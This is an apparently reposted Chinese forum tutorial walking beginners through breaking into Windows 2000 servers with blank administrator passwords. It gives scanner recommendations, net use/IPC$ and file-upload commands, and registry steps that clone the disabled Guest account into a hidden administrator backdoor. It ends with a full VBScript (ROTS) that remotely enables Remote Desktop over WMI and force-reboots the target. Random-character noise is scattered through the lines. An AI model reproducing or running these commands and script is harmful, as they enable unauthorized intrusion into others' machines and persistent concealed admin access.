该用户从未签到
|
一次简单的3389入侵过程
7 J! Q5 T: U' V$ K. B原创:caozhe(草哲) 1 p9 a0 q1 G9 Z% A8 W5 \: H9 ^! E
来源:中国欲网技术论坛--草哲
8 w% \) N) m. J/ T3 t " u% @( q5 `- U0 l! ?- V
我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的! Q; t Y# A( H
! P8 r1 }5 i7 i: z5 M" q4 ?* o+ `于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!
9 n9 ]9 U! n. M! ?+ S+ `, I要入侵,我建议你在win2000环境下来*作!) c) s* [4 A6 J: M) p- V. c
: W4 R, ?* |, G6 ^
首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!
! s0 b$ T8 L, @5 X扫描的X-Scan V2.3、WINNTAutoAttack、流光!
1 b2 X" B- T/ b# Y3 D$ dX-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!3 R% S( `+ L+ V6 g7 h
远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)/ m3 V% v- _$ I% O; \6 w
克隆帐户用个psu就可以了~!
- X8 R9 T5 b+ s& T
x: L5 h- j( D0 u8 v1 TOK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空
6 ?5 O5 A H# |, G# H9 _运行CMD(2000下的DOS),我们给它开终端!
0 j& x' n, |7 M0 g# b9 ]# e3 U3 a2 L0 W命令如下! p8 ~) ~3 ]1 x' K7 E% X
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr; O% S9 G$ `9 |: v9 W. [
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)( F- |/ |6 f. G' C2 }- l% K& e
_7 O3 G) P5 P8 a$ [& C' y因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!7 A. A4 F2 @( t6 j! B4 y. g- a
. U5 `2 T4 ]" B y/ H' \) h
一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
: r {8 t4 x5 p9 q) ]/ H& d安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!
' l, W+ U: l0 p* g% B: W$ w7 w. ? m$ U7 m4 H! d, ?- e2 C
回到DOS下!我们建立IPC$连接!
! X* q8 u, V3 o/ m* K- d. Enet use \\120.0.0.1\ipc$ "" /user:"administrator"
) E: T* f# p$ X( K, O4 l; x: M这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!9 F& ?+ G2 f8 L
copy psu.exe \\120.0.0.1\admin$\system32* d |/ f; ]0 ~/ I7 h
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
/ r" L, S/ c Z5 L) ^8 o. }2 T* a$ k, J
假设guest用户被禁用,我们就是要利用guest做后门帐户!9 c$ {8 w2 w% j# y3 b
在该服务器运行CMD,在命令行下输入; E3 l; b4 A) D5 u- m+ N; h
psu -p regedit -i PID
& b4 S& D3 ]' d+ L! c! y
3 R* I' V5 m5 e1 j6 {0 y) g这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!
/ m' @) q% f! Z- H看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458# Q7 S# g- }' a( K& Z. ?
那么,命令就是这样
, W; d! z4 I# H+ v6 ]" opsu -p regedit -i 5458
- A. Q( c6 ]2 C# h这样直接打开注册表,可以读取本地sam的信息。
- ^' U2 q% G4 R" Y. ]打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
" \) d3 t& l7 o( n- p: s: q$ r下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!1 s/ B* ]6 k: m7 M
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
: f7 }+ Z; V+ Y) _查看administrator的类型,是if4,再看guest的是if5
- U2 m: T# P1 u( l0 h. ~; H好了,知道了类型后,打开- N9 m% G S; ] W
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
* r8 l5 y" u) B: M d# o0 ?这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开
' {' ], s8 D' EHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
5 g( W7 @9 v4 i/ z6 v3 l% U4 i4 j+ N* V双击右侧的F,把刚复制的粘贴到里面!/ ~+ C$ Y: k2 m. f6 C9 c
- s+ u. i$ b1 ^( N* n1 ?; x# Y) g做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F59 O, D3 v; l2 t& G T) O
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
. k) G7 B6 x! ?3 M5 B: x这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。$ ^: u! f( c: q6 }- M9 w5 ~
; }( Z, ]: i4 \* m: ]" W+ V3 ?
打开CMD,在命令行下输入
* S2 v' J' T# w" k* i" P1 knet user guest password
9 D3 a0 o$ e' Z" e& B% j) I这条命令是给guest设置密码,后面的password就是密码, x" U" B$ ]3 o0 Y" T! j
然后输入
0 O' I5 d/ n5 W$ o0 g3 Rnet user guest /active:y4 n1 K; J2 N( T: ?$ ^
这命令是激活guest帐户,然后我们把他禁用3 Y: M/ b4 ^% L# X i+ G5 |# d. V
net user guest /active:n5 m$ @6 ?7 i$ q6 @+ P' l) A$ Y
上面的三行命令必须在DOS下执行!
9 d& o; L0 F/ z; L- o& ?, }
6 w# I0 i, z! D1 y: I# XOK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!- V; U8 \$ C% j! n7 _- ?' o
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!7 o' I3 ]8 E O' `
/ \& F8 w7 C8 Q$ s4 J2 S; f注销一下,用guest登陆吧!
$ N% s, r0 t) r9 O+ c4 S7 b& j. e
G5 x7 c# b, s+ P. `5 H/ c( g打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!
6 o6 \, V) ^' m8 n1 L) I/ a/ C如果还有地方不明白的话,可以问我,我知道的一定告诉大家!4 s& R3 x6 l8 c8 d0 n
+ q8 ~& D9 B& ^ w! ]% T
因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!
0 a) g( P: [+ ]7 i+ M1 Q+ C7 b/ ~& _6 w( r. B
----------------------------------------------------------------------
8 o: F6 ^7 |7 B9 r以下是开终端的脚本,把它存为*.vbe
$ a7 Z% ]/ H$ W" d. b9 t- |4 c: Hon error resume next
4 w3 d z6 R: X& _. r7 |set outstreem=wscript.stdout
5 y$ z6 e% z- G% ^8 zset instreem=wscript.stdin
. v1 a; k E3 f. Y. O& ]1 v3 }) xif (lcase(right(wscript.fullname,11))="wscript.exe") then
v* c" u2 J9 {4 Q2 Z/ t' B set objShell=wscript.createObject("wscript.shell")$ ?1 a5 C% g1 v3 h: O2 ]' M: W
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)); R. H/ w0 \; D' r: f. T3 L; o
wscript.quit
$ ~, r, p! P* T4 s& Bend if- v( e/ v2 C; k/ Z4 v5 C2 d- J
if wscript.arguments.count<3 then! W) E7 b, k9 h1 W- q+ P
usage()% O. Z1 X% h, k0 }+ L8 E' j
wscript.echo "Not enough parameters.": F" K# ~$ _& N- s
wscript.quit! d3 a8 U$ L' D% m( {
end if
( m8 F! S. U- Y$ ~1 e& r
" K0 c+ m9 S% x3 s) q) K% E# u# Eipaddress=wscript.arguments(0)5 t! M7 e4 p5 s2 v2 o
username=wscript.arguments(1)
. {, ^$ }' N- Epassword=wscript.arguments(2)# `$ ^/ q7 c& K$ ]0 [9 L* u
if wscript.arguments.count>3 then
+ y! }" {. N7 h* s; M, T port=wscript.arguments(3)2 h- z, Z+ i& D" k! M
else$ U- d& v2 q! f
port=3389
|; x! S7 v% l+ h# ]2 aend if. i9 G b1 s- I+ x# }6 }( E7 E8 C& G
if not isnumeric(port) or port<1 or port>65000 then. ]& i2 d) B7 s
wscript.echo "The number of port is error."8 F( O& v5 }& v. {7 E+ u7 b- `
wscript.quit
: o) o3 R4 h( o/ w1 u# n" aend if: n T0 q' J0 Y( ^' o( F
if wscript.arguments.count>4 then1 Q3 X, @/ H. ~: `1 Z
reboot=wscript.arguments(4)
3 B9 y0 E, w+ P/ }8 oelse9 c8 F5 B8 T' r. k5 V
reboot=""
4 s# k8 l, \: e }; h& e7 aend if
& N2 M) k5 Q# ^# F9 N" {2 X& f. C* h, O( z- ?
usage()" @$ x* j1 q+ Z; A& q2 ?* P" z
outstreem.write "Conneting "&ipaddress&" ...."# ~5 p+ G0 J2 j# Z9 E1 h% D; u- u
set objlocator=createobject("wbemscripting.swbemlocator")
( n( K, n+ B( d! W! Y1 {( Pset objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
" t" F f- U wshowerror(err.number)# ?4 u5 }: q# u" g# v1 v3 a
objswbemservices.security_.privileges.add 23,true
9 ?3 O" I. ?3 I' ~0 Eobjswbemservices.security_.privileges.add 18,true6 T8 M+ N2 W: m. {. B2 u& e- f% |
1 T. G, U6 a, m+ K0 y5 n4 [: n) y( x
outstreem.write "Checking OS type...."6 t7 L) C/ q' M& x5 `
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
$ Z7 O9 K4 v0 s& cfor each objinstoscaption in colinstoscaption
% t) J7 X" u4 T) D5 z9 ]5 L if instr(objinstoscaption.caption,"Server")>0 then* P; |! K. ]: l7 A; o) Q
wscript.echo "OK!"3 n2 H' O+ d: J; O0 F
else7 w8 N( _" C; Q$ f
wscript.echo "OS type is "&objinstoscaption.caption7 h& X( y! e1 m: U
outstreem.write "Do you want to cancel setup?[y/n]"
( v2 {5 ]: K1 M* y strcancel=instreem.readline
: V1 T( D9 q+ W if lcase(strcancel)<>"n" then wscript.quit
$ g, P" s* X, ]" {, f( q end if& t9 Y- T' H9 ^8 E$ @& a" Z
next
" r1 w, f8 C& ]- z6 [( i
6 b! H/ d! N6 Y7 Zoutstreem.write "Writing into registry ...."
* `: l" ?! j/ ~1 Z9 r' ~set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
/ |3 i: M# X6 h! oHKLM=&h80000002
: U+ t! B+ k6 u5 HHKU=&h800000032 M3 Y m% R" R' h: t+ y" M
with objinstreg
7 v; F; `$ x ^" ^9 `.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"6 x. A7 F/ |, \( T5 R1 I
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0) [' j( u$ i+ h/ C
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" E, R, ?+ l% K$ {
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1+ w2 N3 p' x9 W7 r
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
9 t I+ H8 t6 S6 D. L# J.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",29 K; ^! |& C, H! M# ]
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
6 F) ?8 L- n) D2 u% w.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
* K0 m5 U0 j9 e3 }, p0 p2 l) J.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
& J- K: O2 H+ v8 h; w/ i6 Lend with7 L+ P6 l2 L: V6 l4 E
showerror(err.number): H2 t$ ~5 Y) S0 S$ S: {
" i% h/ Y: Q a* A) ^/ h$ ~6 A# W
rebt=lcase(reboot) o/ }& W' s" p7 ^, {: V! u
flag=0
2 C+ c& g4 ~- \! A7 ]2 C+ {' Lif rebt="/r" or rebt="-r" or rebt="\r" then flag=2% g0 m3 ~' o% z
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
( I- l. C5 X3 P6 |4 L3 `if flag<>0 then
# q) p4 W7 Y- d; y. v. O outstreem.write "Now, reboot target...."# E7 }8 R$ y. r" J5 [+ A: B0 [: \
strwqlquery="select * from win32_operatingsystem where primary='true'"$ r y9 ?' G) p0 {6 Y
set colinstances=objswbemservices.execquery(strwqlquery)2 y9 m, {. K( I+ A) k
for each objinstance in colinstances
1 ] w! a4 l! N, ~1 D objinstance.win32shutdown(flag)4 L, s4 d9 W4 U% v$ @
next
& N, F8 ^6 Y+ u0 f* i showerror(err.number)
2 r9 C$ S4 l& F$ Qelse8 V- m9 _8 s/ Y( W% k* a
wscript.echo "You need to reboot target."&vbcrlf&"Then,"3 `2 N C- p7 D* B) Q/ C0 Q, {
end if( F; ?5 w. x. N3 V9 T
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"( {- c# b T) ]7 U7 i- v7 e
$ a& l6 G4 G7 S+ j9 W( ~
function showerror(errornumber)
) }6 _$ C" E0 h6 }+ P, @/ jif errornumber Then5 S( L0 ]4 }; {. x0 v5 G
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
R3 u! @0 F7 }3 ` if err.description <> "" then2 K- \) y( G$ P0 H) L, A5 K
wscript.echo "Error description: "&err.description&"."
9 ^ J1 I9 Q- K8 m) T end if% | _9 @1 m3 r+ S
wscript.quit: q" G- }' K( E9 y- e
else* c6 ^0 t1 R/ ]
wscript.echo "OK!"% X6 R, O W8 B" d& j# k8 ~
end if
# D; D3 ~5 a2 ?/ v) y# @# zend function
8 _0 }% q$ S/ G; W3 A/ I: @
6 l4 G% l* O9 U Efunction usage()
: b5 Y( z8 G2 `) I" ewscript.echo string(79,"*")3 l, {, O0 l0 f+ O) x
wscript.echo "ROTS v1.05"
% @! r4 Y1 Q7 ^0 {) `wscript.echo "Remote Open Terminal services Script, by 草哲"8 |8 a9 R0 T8 A7 t) Y5 k
wscript.echo "Welcome to visite www.5458.net"
1 v9 _7 w& V, g- x3 B* i# T) mwscript.echo "Usage:"" ~1 M& C* n- |4 b# ]' ^
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"1 \) m' ]+ d1 @
wscript.echo "port: default number is 3389."0 w/ P" H0 f+ w
wscript.echo "/r: auto reboot target."
; x1 \0 ]' f2 B5 gwscript.echo "/fr: auto force reboot target."5 Y- p# x0 e! y. X( e$ Z( Z
wscript.echo string(79,"*")&vbcrlf
1 p0 p, S# S+ v: u5 f% d$ b, v# Pend function1 E2 C1 i( m" P9 g
+ ]# ?8 l% k- d6 Y M转自安全焦点 |
|